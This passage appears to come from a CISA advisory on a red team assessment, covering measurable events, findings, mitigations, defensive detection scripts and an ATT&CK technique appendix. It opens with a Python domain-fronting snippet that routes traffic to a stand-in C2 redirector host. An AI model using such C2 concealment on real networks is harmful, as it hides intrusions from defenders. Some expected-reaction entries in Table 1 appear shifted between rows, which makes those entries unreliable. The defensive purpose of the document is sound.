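    # should actually reach. Hostnames here are hypothetical.
    resp = requests.get(
        "https://cdn.high-reputation.example/",              # what defenders see
        headers={"Host": "c2-redirector.attacker.example"},  # where the CDN routes
        timeout=10,
    )
    print(resp.status_code)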
Phase II: Red Team Measurable Events Activity

The red team executed 13 measurable events designed to provoke a response from the people, processes, and technology defending the organization’s network. See Table 1 for a description of the events, the expected network defender activity, and the organization’s actual response.

Table 1: Measurable events, with expected detection points, expected network defender reactions, and the organization's reported reactions

Internal Port Scan
  • Description: Launch a scan from inside the network from a previously gained workstation to enumerate ports on target workstation, server, and domain controller system(s).
  • MITRE ATT&CK Technique(s): Network Service Discovery [T1046]
  • Expected Detection Points: Network Monitoring and Analysis Tools; Intrusion Detection or Prevention Systems; Endpoint Protection Platform
  • Expected Network Defender Reactions: Detect target hosts and ports; Identify associated scanning process; Analyze scanning host once detected; Develop response plan
  • Reported Reactions: None

Comprehensive Active Directory and Host Enumeration
  • Description: Perform AD enumeration by querying all domain objects from the DC and enumerating trust relationships within the AD Forest, user accounts, and current session information from every domain computer (Workstation and Server).
  • MITRE ATT&CK Technique(s): Domain Trust Discovery [T1482]; Account Discovery: Domain Account [T1087.002]; System Owner/User Discovery [T1033]; Remote System Discovery [T1018]
  • Expected Detection Points: Network Monitoring and Analysis Tools; Intrusion Detection or Prevention Systems; Endpoint Protection Platform
  • Expected Network Defender Reactions: Detect target hosts and ports; Identify associated scanning process; Analyze scanning host once detected; Develop response plan
  • Reported Reactions: Collection process stopped before completion. Host isolated and sent for forensics.

Data Exfiltration—1 GB of Data
  • Description: Send a large amount (1 GB) of mock sensitive information to an external system over various protocols, including ICMP, DNS, FTP, and/or HTTP/S.
  • MITRE ATT&CK Technique(s): Exfiltration Over Alternative Protocol [T1048]
  • Expected Detection Points: Network Monitoring and Analysis Tools; Intrusion Detection or Prevention Systems; Endpoint Protection Platform
  • Expected Network Defender Reactions: Detect target hosts and ports; Identify associated scanning process; Analyze scanning host once detected; Develop response plan
  • Reported Reactions: None

Malicious Traffic Generation—Workstation to External Host
  • Description: Establish a session that originates from a target Workstation system directly to an external host over a clear text protocol, such as HTTP.
  • MITRE ATT&CK Technique(s): Application Layer Protocol [T1071]
  • Expected Detection Points: Intrusion Detection or Prevention Systems; Endpoint Protection Platform; Windows Event Logs
  • Expected Network Defender Reactions: Detect and identify source IP and source process of enumeration; Analyze scanning host once detected; Develop response plan
  • Reported Reactions: None

Active Directory Account Lockout
  • Description: Lock out several administrative AD accounts.
  • MITRE ATT&CK Technique(s): Account Access Removal [T1531]
  • Expected Detection Points: Windows Event Logs; End User Reporting
  • Expected Network Defender Reactions: Detect and identify source IP and source process of exfiltration; Analyze host used for exfiltration once detected; Develop response plan
  • Reported Reactions: None

Local Admin User Account Creation (workstation)
  • Description: Create a local administrator account on a target workstation system.
  • MITRE ATT&CK Technique(s): Create Account: Local Account [T1136.001]; Account Manipulation [T1098]
  • Expected Detection Points: Intrusion Detection or Prevention Systems; Endpoint Protection Platform; Web Proxy Logs
  • Expected Network Defender Reactions: Detect and identify source IP and source process of malicious traffic; Investigate destination IP address; Triage compromised host; Develop response plan
  • Reported Reactions: None

Local Admin User Account Creation (server)
  • Description: Create a local administrator account on a target server system.
  • MITRE ATT&CK Technique(s): Create Account: Local Account [T1136.001]; Account Manipulation [T1098]
  • Expected Detection Points: Windows Event Logs
  • Expected Network Defender Reactions: Detect account creation; Identify source of change; Verify change with system owner; Develop response plan
  • Reported Reactions: None

Active Directory Account Creation
  • Description: Create AD accounts and add them to the domain admins group.
  • MITRE ATT&CK Technique(s): Create Account: Domain Account [T1136.002]; Account Manipulation [T1098]
  • Expected Detection Points: Windows Event Logs
  • Expected Network Defender Reactions: Detect account creation; Identify source of change; Verify change with system owner; Develop response plan
  • Reported Reactions: None

Workstation Admin Lateral Movement—Workstation to Workstation
  • Description: Use a previously compromised workstation admin account to upload and execute a payload via SMB and Windows Service Creation, respectively, on several target Workstations.
  • MITRE ATT&CK Technique(s): Valid Accounts: Domain Accounts [T1078.002]; Remote Services: SMB/Windows Admin Shares [T1021.002]; Create or Modify System Process: Windows Service [T1543.003]
  • Expected Detection Points: Windows Event Logs
  • Expected Network Defender Reactions: Detect account compromise; Analyze compromised host; Develop response plan
  • Reported Reactions: None

Domain Admin Lateral Movement—Workstation to Domain Controller
  • Description: Use a previously compromised domain admin account to upload and execute a payload via SMB and Windows Service Creation, respectively, on a target DC.
  • MITRE ATT&CK Technique(s): Valid Accounts: Domain Accounts [T1078.002]; Remote Services: SMB/Windows Admin Shares [T1021.002]; Create or Modify System Process: Windows Service [T1543.003]
  • Expected Detection Points: Windows Event Logs
  • Expected Network Defender Reactions: Detect account compromise; Triage compromised host; Develop response plan
  • Reported Reactions: None

Malicious Traffic Generation—Domain Controller to External Host
  • Description: Establish a session that originates from a target Domain Controller system directly to an external host over a clear text protocol, such as HTTP.
  • MITRE ATT&CK Technique(s): Application Layer Protocol [T1071]
  • Expected Detection Points: Intrusion Detection or Prevention Systems; Endpoint Protection Platform; Web Proxy Logs
  • Expected Network Defender Reactions: Detect and identify source IP and source process of malicious traffic; Investigate destination IP address; Triage compromised host; Develop response plan
  • Reported Reactions: None

Trigger Host-Based Protection—Domain Controller
  • Description: Upload and execute a well-known (e.g., with a signature) malicious file to a target DC system to generate host-based alerts.
  • MITRE ATT&CK Technique(s): Ingress Tool Transfer [T1105]
  • Expected Detection Points: Endpoint Protection Platform; Endpoint Detection and Response
  • Expected Network Defender Reactions: Detect and identify source IP and source process of malicious traffic; Investigate destination IP address; Triage compromised host; Develop response plan
  • Reported Reactions: Malicious file was removed by antivirus.

Ransomware Simulation
  • Description: Execute simulated ransomware on multiple Workstation systems to simulate a ransomware attack. Note: This technique does NOT encrypt files on the target system.
  • MITRE ATT&CK Technique(s): N/A
  • Expected Detection Points: End User Reporting
  • Expected Network Defender Reactions: Investigate end user reported event; Triage compromised host; Develop response plan
  • Reported Reactions: Four users reported the event to defensive staff.
Findings
Key Issues

The red team noted the following key issues relevant to the security of the organization’s network. These findings contributed to the team’s ability to gain persistent, undetected access across the organization’s sites. See the Mitigations section for recommendations on how to mitigate these issues.

  • Insufficient host and network monitoring. Most of the red team’s Phase II actions failed to provoke a response from the people, processes, and technology defending the organization’s network. The organization failed to detect lateral movement, persistence, and C2 activity via their intrusion detection or prevention systems, endpoint protection platform, web proxy logs, and Windows event logs. Additionally, throughout Phase I, the team received no deconflictions or confirmation that the organization caught their activity. Below is a list of some of the higher risk activities conducted by the team that were opportunities for detection:
    • Phishing
    • Lateral movement reuse
    • Generation and use of the golden ticket
    • Anomalous LDAP traffic
    • Anomalous internal share enumeration
    • Unconstrained Delegation server compromise
    • DCSync
    • Anomalous account usage during lateral movement
    • Anomalous outbound network traffic
    • Anomalous outbound SSH connections to the team’s cloud servers from workstations
  • Lack of monitoring on endpoint management systems. The team used the organization’s MDM system to gain root access to machines across the organization’s network without being detected. Endpoint management systems provide elevated access to thousands of hosts and should be treated as high value assets (HVAs) with additional restrictions and monitoring.
  • KRBTGT never changed. The Site 1 krbtgt account password had not been updated for over a decade. The krbtgt account is a domain default account that acts as a service account for the key distribution center (KDC) service used to encrypt and sign all Kerberos tickets for the domain. Compromise of the krbtgt account could provide adversaries with the ability to sign their own TGTs, facilitating domain access years after the date of compromise. The red team was able to use the krbtgt account to forge TGTs for multiple accounts throughout Phase I.
  • Excessive permissions to standard users. The team discovered several standard user accounts that have local administrator access to critical servers. This misconfiguration allowed the team to use the low-level access of a phished user to move laterally to an Unconstrained Delegation host and compromise the entire domain.
  • Hosts with Unconstrained Delegation enabled unnecessarily. Hosts with Unconstrained Delegation enabled store the Kerberos TGTs of all users that authenticate to that host, enabling actors to steal service tickets or compromise krbtgt accounts and perform golden ticket or “silver ticket” attacks. The team performed an NTLM-relay attack to obtain the DC’s TGT, followed by a golden ticket attack on a SharePoint server with Unconstrained Delegation to gain the ability to impersonate any Site 1 AD account.
  • Use of non-secure default configurations. The organization used default configurations for hosts running Windows Server 2012 R2. The default configuration allows unprivileged users to query group membership of local administrator groups, and the red team used this to identify several standard user accounts with administrative access via a Windows Server 2012 R2 SharePoint server.
Additional Issues

The team noted the following additional issues.

  • Ineffective separation of privileged accounts. Some workstations allowed unprivileged accounts to have local administrator access; for example, the red team discovered an ordinary user account in the local admin group for the SharePoint server. If a user with administrative access is compromised, an actor can access servers without needing to elevate privileges. Administrative and user accounts should be separated, and designated admin accounts should be exclusively used for admin purposes.
  • Lack of server egress control. Most servers, including domain controllers, allowed unrestricted egress traffic to the internet.
  • Inconsistent host configuration. The team observed inconsistencies on servers and workstations within the domain, including inconsistent membership in the local administrator group among different servers or workstations. For example, some workstations had “Server Admins” or “Domain Admins” as local administrators, and other workstations had neither.
  • Potentially unwanted programs. The team noticed potentially unusual software, including music software, installed on both workstations and servers. These extraneous software installations indicate inconsistent host configuration (see above) and increase the attack surfaces for malicious actors to gain initial access or escalate privileges once in the network.
  • Mandatory password changes enabled. During the assessment, the team keylogged a user during a mandatory password change and noticed that only the final character of their password was modified. This predictable pattern is likely a byproduct of requiring domain passwords to be changed every 60 days.
  • Smart card use was inconsistent across the domain. While the technology was deployed, it was not applied uniformly, and a significant portion of users lacked smart card protections. The team used these unprotected accounts throughout their assessment to move laterally through the domain and gain persistence.
Noted Strengths

The red team noted the following technical controls or defensive measures that prevented or hampered offensive actions:

  • The organization conducts regular, proactive penetration tests and adversarial assessments and invests in hardening their network based on findings.
    • The team was unable to discover any easily exploitable services, ports, or web interfaces from more than three million external in-scope IPs. This forced the team to resort to phishing to gain initial access to the environment.
    • Service account passwords were strong. The team was unable to crack any of the hashes obtained from the 610 service accounts pulled. This is a critical strength because it slowed the team's movement around the network in the initial parts of Phase I.
    • The team did not discover any useful credentials on open file shares or file servers. This also slowed the team's progress in moving around the network.
  • MFA was used for some SBSs. The team was blocked from moving to SBS 2 by an MFA prompt.
  • There were strong security controls and segmentation for SBS systems. Systems with direct access to SBSs were located on separate networks, and SBS administrators used workstations protected by local firewalls.

MITIGATIONS

CISA recommends organizations implement the recommendations in Table 2 to mitigate the issues listed in the Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. See CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Table 2: Recommendations to mitigate identified issues

Issue: Insufficient host and network monitoring
Recommendations:
  • Establish a security baseline of normal network traffic and tune network appliances to detect anomalous behavior [CPG 3.1]. Tune host-based products to detect anomalous binaries, lateral movement, and persistence techniques.
  • Create alerts for Windows event log authentication codes, especially for the domain controllers. This could help detect some of the pass-the-ticket, DCSync, and other techniques described in this report. (A minimal detection sketch follows this table.)
  • From a detection standpoint, focus on identity and access management (IAM) rather than just network traffic or static host alerts. Consider who is accessing what (what resource), from where (what internal host or external location), and when (what day and time the access occurs). Look for access behavior that deviates from what is expected or is indicative of AD abuse.
  • Reduce the attack surface by limiting the use of legitimate administrative pathways and tools such as PowerShell, PsExec, and WMI, which are often used by malicious actors. CISA recommends selecting one tool to administer the network, ensuring logging is turned on [CPG 3.1], and disabling the others.
  • Consider using "honeypot" service principal names (SPNs) to detect attempts to crack account hashes [CPG 1.1].
  • Conduct regular assessments to ensure processes and procedures are up to date and can be followed by security staff and end users.
  • Consider using red team tools, such as SharpHound, for AD enumeration to identify users with excessive privileges and misconfigured hosts (e.g., with Unconstrained Delegation enabled).
  • Ensure all commercial tools deployed in your environment are regularly tuned to pick up on relevant activity in your environment.

Issue: Lack of monitoring on endpoint management systems
Recommendation: Treat endpoint management systems as HVAs with additional restrictions and monitoring because they provide elevated access to thousands of hosts.

Issue: KRBTGT never changed
Recommendation: Change the krbtgt account password on a regular schedule, such as every 6 to 12 months, or whenever it may have been compromised. Note that this change must be performed carefully to rotate the credential without breaking AD functionality: the password must be changed twice to effectively invalidate the old credentials, and the waiting period between the two resets must be greater than the maximum lifetime of Kerberos tickets, which is 10 hours by default. See Microsoft's KRBTGT account maintenance considerations guidance for more information.

Issue: Excessive permissions to standard users and ineffective separation of privileged accounts
Recommendations: Implement the principle of least privilege:
  • Grant standard user rights for standard user tasks such as email, web browsing, and using line-of-business (LOB) applications.
  • Periodically audit standard accounts and minimize where they have privileged access.
  • Periodically audit AD permissions to ensure users do not have excessive permissions and have not been added to admin groups.
  • Evaluate which administrative groups should administer which servers/workstations, and ensure group members use administrative accounts instead of standard accounts.
  • Separate administrator accounts from user accounts [CPG 1.5]. Only allow designated admin accounts to be used for admin purposes. If an individual user needs administrative rights over their workstation, use a separate account that does not have administrative access to other hosts, such as servers.
  • Consider using a privileged access management (PAM) solution to manage access to privileged accounts and resources [CPG 3.4]. PAM solutions can also log and alert on usage to detect unusual activity and may have helped stop the red team from accessing resources with admin accounts. Note: password vaults associated with PAM solutions should be treated as HVAs with additional restrictions and monitoring (see below).
  • Configure time-based access for accounts at the admin level and higher. For example, the just-in-time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege, as well as the Zero Trust model. Under JIT, a network-wide policy automatically disables administrator accounts at the AD level when they are not in direct need; when an individual user needs such an account, they submit a request through an automated process that enables access to a system, but only for the timeframe needed to complete the task.

Issue: Hosts with Unconstrained Delegation enabled
Recommendations:
  • Remove Unconstrained Delegation from all servers. If Unconstrained Delegation functionality is required, upgrade operating systems and applications to leverage other approaches (e.g., constrained delegation), or explore whether systems can be retired or further isolated from the enterprise. CISA recommends Windows Server 2019 or greater.
  • Consider disabling or limiting NTLM and WDigest authentication where possible, including using their use as criteria for prioritizing updates to legacy systems or for segmenting the network. Instead, use more modern federation protocols (SAML, OIDC) or Kerberos for authentication with AES-256 encryption [CPG 3.4].
  • If NTLM must be enabled, enable Extended Protection for Authentication (EPA) to prevent some NTLM-relay attacks, and implement SMB signing to prevent certain adversary-in-the-middle and pass-the-hash attacks [CPG 3.4]. (A quick SMB-signing check also follows this table.) See Microsoft's Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) and Overview of Server Message Block signing for more information.

Issue: Use of non-secure default configurations
Recommendation: Keep systems and software up to date [CPG 5.1]. If updates cannot be uniformly installed, update insecure configurations to meet current standards.

Issue: Lack of server egress control
Recommendation: Configure internal firewalls and proxies to restrict internet traffic from hosts that do not require it. If a host requires specific outbound traffic, consider creating an allowlist policy of domains.

Issue: Large number of credentials in a shared vault
Recommendations: Treat password vaults as HVAs with additional restrictions and monitoring [CPG 3.4]:
  • If on-premises, require MFA for admins and apply network segmentation [CPG 1.3]. Use solutions with end-to-end encryption where applicable [CPG 3.3].
  • If cloud-based, evaluate the provider to ensure use of strong security controls such as MFA and end-to-end encryption [CPG 1.3, 3.3].

Issue: Inconsistent host configuration
Recommendation: Establish a baseline/gold image for workstations and servers and deploy hosts from that image [CPG 2.5]. Use standardized groups to administer hosts in the network.

Issue: Potentially unwanted programs
Recommendation: Implement software allowlisting to ensure users can only install software from an approved list [CPG 2.1]. Remove unnecessary, extraneous software from servers and workstations.

Issue: Mandatory password changes enabled
Recommendation: Consider requiring changes to memorized passwords only in the event of compromise. Regular changing of memorized passwords can lead to predictable patterns, and both CISA and NIST recommend against changing passwords on regular intervals.
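
To illustrate the event-log alerting recommended for insufficient host and network monitoring, the following minimal detection sketch pulls Event ID 4769 (a Kerberos service ticket was requested) with the built-in Windows wevtutil tool and flags RC4-encrypted tickets (type 0x17), a common Kerberoasting indicator. It assumes an elevated shell on a domain controller and the default English text rendering of event fields; tune it before relying on it.

```python
# Minimal sketch: flag RC4-encrypted Kerberos service ticket requests (4769),
# a common Kerberoasting indicator. Run in an elevated shell on a DC.
import subprocess

query = "*[System[(EventID=4769)]]"  # "A Kerberos service ticket was requested"
out = subprocess.run(
    ["wevtutil", "qe", "Security", f"/q:{query}", "/f:text", "/c:200"],
    capture_output=True, text=True, check=True,
).stdout

for event in out.split("Event["):        # crude split on wevtutil's text output
    if "0x17" in event:                  # RC4-HMAC ticket encryption type
        for line in event.splitlines():  # print a few fields for triage
            if "Account Name:" in line or "Service Name:" in line:
                print(line.strip())
        print("---")
```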
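
Likewise, for the NTLM-relay mitigations above, one quick check is whether a Windows server requires SMB signing, which is recorded in the standard LanmanServer registry value. A minimal sketch using Python's built-in winreg module, run locally on the server being checked:

```python
# Minimal sketch: confirm SMB signing is required on this Windows server.
import winreg

KEY = r"SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"

with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY) as key:
    value, _ = winreg.QueryValueEx(key, "RequireSecuritySignature")

print("SMB signing required" if value == 1
      else "WARNING: SMB signing not required; NTLM-relay exposure")
```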

Additionally, CISA recommends organizations implement the mitigations below to improve their cybersecurity posture:

  • Provide users with regular training and exercises, specifically related to phishing emails [CPG 4.3]. Phishing accounts for the majority of initial access intrusion events.
  • Enforce phishing-resistant MFA to the greatest extent possible [CPG 1.3].
  • Reduce the risk of credential compromise via the following:
    • Place domain admin accounts in the Protected Users group to prevent caching of password hashes locally; this also forces Kerberos AES authentication as opposed to weaker RC4 or NTLM.
    • Implement Credential Guard for Windows 10 and Server 2016 (refer to Microsoft: Manage Windows Defender Credential Guard for more information). For Windows Server 2012 R2, enable Protected Process Light for Local Security Authority (LSA).
    • Refrain from storing plaintext credentials in scripts [CPG 3.4]. The red team discovered a PowerShell script containing plaintext credentials that allowed them to escalate to admin. A minimal scanning sketch appears after this list.
  • Upgrade to Windows Server 2019 or greater and Windows 10 or greater. These versions have security features not included in older operating systems.
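
As a lightweight complement to the plaintext-credential recommendation above, the sketch below scans PowerShell scripts for common credential patterns. The patterns and file glob are illustrative assumptions, not an exhaustive scanner; prefer a dedicated secret-scanning tool in production.

```python
# Minimal sketch: flag likely plaintext credentials in PowerShell scripts.
# Patterns are illustrative; extend for other languages and secret formats.
import re
from pathlib import Path

PATTERNS = [
    re.compile(r"password\s*=\s*['\"][^'\"]+['\"]", re.IGNORECASE),
    re.compile(r"-AsPlainText", re.IGNORECASE),  # common PowerShell giveaway
]

for path in Path(".").rglob("*.ps1"):
    text = path.read_text(errors="ignore")
    for pattern in PATTERNS:
        for match in pattern.finditer(text):
            line_no = text.count("\n", 0, match.start()) + 1
            print(f"{path}:{line_no}: {match.group(0)[:60]}")
```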

As a long-term effort, CISA recommends organizations prioritize implementing a more modern, Zero Trust network architecture that:

  • Leverages secure cloud services for key enterprise security capabilities (e.g., identity and access management, endpoint detection and response, policy enforcement).
  • Upgrades applications and infrastructure to leverage modern identity management and network access practices.
  • Centralizes and streamlines access to cybersecurity data to drive analytics for identifying and managing cybersecurity risks.
  • Invests in technology and personnel to achieve these goals.

CISA encourages organizational IT leadership to ask their executive leadership the question: Can the organization accept the business risk of NOT implementing critical security controls such as MFA? Risks of that nature should typically be acknowledged and prioritized at the most senior levels of an organization.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 3).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a comprehensive set of performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process. A minimal sketch of such a results matrix follows this list.
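
The sketch below illustrates one way to record the "comprehensive performance data" from step 5: a small results matrix tracking how each tested technology performed against each technique. The technique IDs come from Table 3; the technologies and outcomes shown are illustrative assumptions, not findings from this advisory.

```python
# Minimal sketch: a results matrix for control validation against ATT&CK.
from dataclasses import dataclass

@dataclass
class TestResult:
    technique_id: str   # e.g., an ID from Table 3 of this advisory
    technology: str     # the security control under test
    detected: bool
    prevented: bool

results = [  # example outcomes only
    TestResult("T1558.001", "SIEM (4769 alerting)", detected=True, prevented=False),
    TestResult("T1021.002", "EDR", detected=False, prevented=False),
]

for r in results:
    gap = "" if (r.detected or r.prevented) else "  <-- coverage gap: tune or compensate"
    print(f"{r.technique_id:<10} {r.technology:<22} "
          f"detected={r.detected} prevented={r.prevented}{gap}")
```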

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

See the RedEye tool on CISA’s GitHub page. RedEye is an interactive, open-source analytic tool used to visualize and report red team command and control activities. See the RedEye tool overview video for more information.

REFERENCES

[1] Bleeping Computer: New DFSCoerce NTLM Relay attack allows Windows domain takeover

APPENDIX: MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 3 for all referenced red team tactics and techniques in this advisory. Note: activity was from Phase I unless noted.

Table 3: Red team MITRE ATT&CK tactics and techniques

Reconnaissance

Technique Title | ID | Use
Gather Victim Identity Information: Email Addresses | T1589.002 | The team found employee email addresses via open-source research.
Gather Victim Identity Information: Employee Names | T1589.003 | The team identified employee names via open-source research that could be used to derive email addresses.
Gather Victim Network Information: Network Security Appliances | T1590.006 | The team identified the organization’s MDM vendor and leveraged that information to move laterally to SBS-connected assets.
Gather Victim Org Information | T1591 | The team conducted open-source research and identified an organizational branch that likely had access to an SBS asset.
Gather Victim Org Information: Determine Physical Locations | T1591.001 | The team conducted open-source research to identify the physical locations of upkeep/management staff of selected assets.
Search Open Technical Databases: Scan Databases | T1596.005 | The team queried an MDM SQL database to identify target administrators who recently connected with the MDM.

Resource Development

Technique Title | ID | Use
Acquire Infrastructure | T1583 | The team used third-party owned and operated infrastructure throughout their assessment for C2.
Establish Accounts: Email Accounts | T1585.002 | The team used commercially available email platforms for their spearphishing activity.
Obtain Capabilities: Tool | T1588.002 | The team used the following tools: Cobalt Strike and Merlin payloads for C2; KeeThief to obtain a decryption key from a KeePass database; Rubeus and DFSCoerce in an NTLM relay attack.

Initial Access

Technique Title | ID | Use
Phishing: Spearphishing Link | T1566.002 | The team sent spearphishing emails with links to a red-team-controlled domain to gain access to the organization’s systems.

Execution

Technique Title | ID | Use
Native API | T1106 | The team created a policy via the MDM API, which downloaded and executed a payload on a workstation.
User Execution | T1204 | Users downloaded and executed the team’s initial access payloads after clicking buttons to trigger download and execution.

Persistence

Technique Title | ID | Use
Account Manipulation | T1098 | The team elevated account privileges to administrator and modified the user’s account by adding Create Policy and Delete Policy permissions. During Phase II, the team created local admin accounts and an AD account; they added the created AD account to a domain admins group.
Create Account: Local Account | T1136.001 | During Phase II, the team created a local administrator account on a workstation and a server.
Create Account: Domain Account | T1136.002 | During Phase II, the team created an AD account.
Create or Modify System Process: Windows Service | T1543.003 | During Phase II, the team leveraged compromised workstation and domain admin accounts to execute a payload via Windows service creation on target workstations and the DC.
Event Triggered Execution: Windows Management Instrumentation Event Subscription | T1546.003 | The team used WMI event subscriptions to move laterally between sites.
Hijack Execution Flow: DLL Search Order Hijacking | T1574.001 | The team used DLL hijacking to move laterally between sites.

Privilege Escalation

Technique Title | ID | Use
Abuse Elevation Control Mechanism | T1548 | The team elevated user account privileges to administrator by modifying the user’s account to add Create Policy and Delete Policy permissions.

Defense Evasion

Technique Title | ID | Use
Valid Accounts: Domain Accounts | T1078.002 | During Phase II, the team compromised a domain admin account and used it to move laterally to multiple workstations and the DC.

Credential Access

Technique Title | ID | Use
OS Credential Dumping: LSASS Memory | T1003.001 | The team obtained cached credentials from a SharePoint server account by taking a snapshot of lsass.exe with a tool called nanodump, exporting the output, and processing it offline with Mimikatz.
OS Credential Dumping: DCSync | T1003.006 | The team harvested AES-256 hashes via DCSync.
Brute Force: Password Cracking | T1110.002 | The team cracked a user’s workstation account password after learning the user’s patterns from plaintext credentials.
Unsecured Credentials | T1552 | The team found backups of a MySQL database that contained the encryption key needed to decrypt SSH passwords.
Unsecured Credentials: Credentials in Files | T1552.001 | The team found plaintext credentials for an API user account stored in PowerShell scripts on an MDM server.
Unsecured Credentials: Bash History | T1552.003 | The team found bash history files on Workstation 5 that appeared to contain SSH passwords.
Credentials from Password Stores: Password Managers | T1555.005 | The team pulled credentials from a KeePass database.
Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay | T1557.001 | The team ran the DFSCoerce Python script, which prompted DC authentication to a server using the server’s NTLM hash. The team then deployed Rubeus to capture the incoming DC TGT.
Steal or Forge Kerberos Tickets: Golden Ticket | T1558.001 | The team used the acquired krbtgt account hash throughout their assessment to forge legitimate TGTs.
Steal or Forge Kerberos Tickets: Kerberoasting | T1558.003 | The team leveraged Rubeus and DFSCoerce in an NTLM relay attack to obtain the DC’s TGT from a host with Unconstrained Delegation enabled.

Discovery

Technique Title | ID | Use
System Network Configuration Discovery | T1016 | The team queried the AD for information about the network’s sites and subnets.
Remote System Discovery | T1018 | The team queried the AD, during Phases I and II, for information about computers on the network.
System Network Connections Discovery | T1049 | The team listed existing network connections on SCCM Server 1, revealing an active SMB connection with Server 2.
Permission Groups Discovery: Domain Groups | T1069.002 | The team leveraged ldapsearch and dsquery to query and scrape Active Directory information.
Account Discovery: Domain Account | T1087.002 | The team queried AD for AD users (during Phases I and II), including for members of a SharePoint admin group and several standard user accounts with administrative access.
Cloud Infrastructure Discovery | T1580 | The team found SecOps network diagrams on a host detailing cloud infrastructure boundaries.
Domain Trust Discovery | T1482 | During Phase II, the team enumerated trust relationships within the AD forest.
Group Policy Discovery | T1615 | The team scraped AD information, including GPOs.
Network Service Discovery | T1046 | During Phase II, the team enumerated ports on target systems from a previously compromised workstation.
System Owner/User Discovery | T1033 | During Phase II, the team enumerated the AD for current session information from every domain computer (workstations and servers).

Lateral Movement

Technique Title | ID | Use
Remote Services: SMB/Windows Admin Shares | T1021.002 | The team moved laterally with an SMB beacon. During Phase II, they used compromised workstation and domain admin accounts to upload a payload via SMB to several target workstations and the DC.
Use Alternate Authentication Material: Pass the Hash | T1550.002 | The team ran the DFSCoerce Python script, which prompted DC authentication to a server using the server’s NTLM hash. The team then deployed Rubeus to capture the incoming DC TGT.
Use Alternate Authentication Material: Pass the Ticket | T1550.003 | The team used the asktgt command to impersonate accounts for which they had credentials by requesting account TGTs.

Command and Control

Technique Title | ID | Use
Application Layer Protocol | T1071 | The team remotely enumerated the local administrators group on target hosts to find valid user accounts. This technique relies on anonymous SMB pipe binds, which are disabled by default starting with Server 2016. During Phase II, the team established sessions that originated from a target workstation, and from the DC directly, to an external host over a clear-text protocol.
Application Layer Protocol: Web Protocols | T1071.001 | The team’s C2 redirectors used HTTPS reverse proxies to redirect C2 traffic.
Application Layer Protocol: File Transfer Protocols | T1071.002 | The team used HTTPS reverse proxies to redirect C2 traffic between the target network and the team’s Cobalt Strike servers.
Encrypted Channel | T1573 | The team’s C2 traffic was encrypted in transit using encryption keys stored on their C2 servers.
Ingress Tool Transfer | T1105 | During Phase II, the team uploaded and executed well-known malicious files on the DC to generate host-based alerts.
Proxy: External Proxy | T1090.002 | The team used redirectors to redirect C2 traffic between the target organization’s network and the team’s C2 servers.
Proxy: Domain Fronting | T1090.004 | The team used domain fronting to disguise outbound traffic and to diversify the domains with which the persistent beacons communicated.

Impact

Technique Title | ID | Use
Account Access Removal | T1531 | During Phase II, the team locked out several administrative AD accounts.


Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-059a